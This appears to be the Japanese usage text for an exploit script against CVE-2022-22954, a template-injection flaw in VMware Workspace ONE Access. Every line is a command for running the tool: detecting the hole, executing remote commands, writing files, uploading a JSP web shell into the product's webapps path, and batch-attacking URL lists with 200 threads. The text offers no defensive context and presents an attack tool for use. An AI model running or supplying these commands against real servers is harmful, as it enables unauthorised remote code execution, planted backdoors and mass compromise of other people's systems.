
CVE-2022-22954 VMware Workspace ONE Access freemarker SSTI 脆弱性 コマンド実行、一括検出スクリプト、ファイル書き込み
複数の脆弱性トリガーポイントの検出、マルチスレッドバッチ検出、コマンド実行、ファイル書き込み
// 単一ターゲットの脆弱性検出
python CVE-2022-22954.py -u https://x.x.x.x
// コマンド実行
python CVE-2022-22954.py -u https://x.x.x.x -c "id"
// ファイル書き込み
python CVE-2022-22954.py -u https://x.x.x.x -fn test.jsp -fc "test"
// ファイルアップロード(Windowsの場合、ファイル名にパス指定が必要)
python CVE-2022-22954.py -u https://x.x.x.x -fn test.jsp -fp "D:\Desktop\shell.jsp"
// 指定パスへのアップロード
python CVE-2022-22954.py -u https://x.x.x.x -fn "/opt/vmware/horizon/workspace/webapps/catalog-portal/test.jsp" -fp "D:\Desktop\shell.jsp"
// バッチ検出(使い方は同じ)
python CVE-2022-22954.py -f url.txt
python CVE-2022-22954.py -f url.txt -c "id" -t 200
python CVE-2022-22954.py -f url.txt -fn test.jsp -fc "test" -t 200
python CVE-2022-22954.py -f url.txt -fn test.jsp -fp "D:\Desktop\shell.jsp" -t 200
python CVE-2022-22954.py -f url.txt -fn "/opt/vmware/horizon/workspace/webapps/catalog-portal/test.jsp" -fp "D:\Desktop\shell.jsp" -t 200
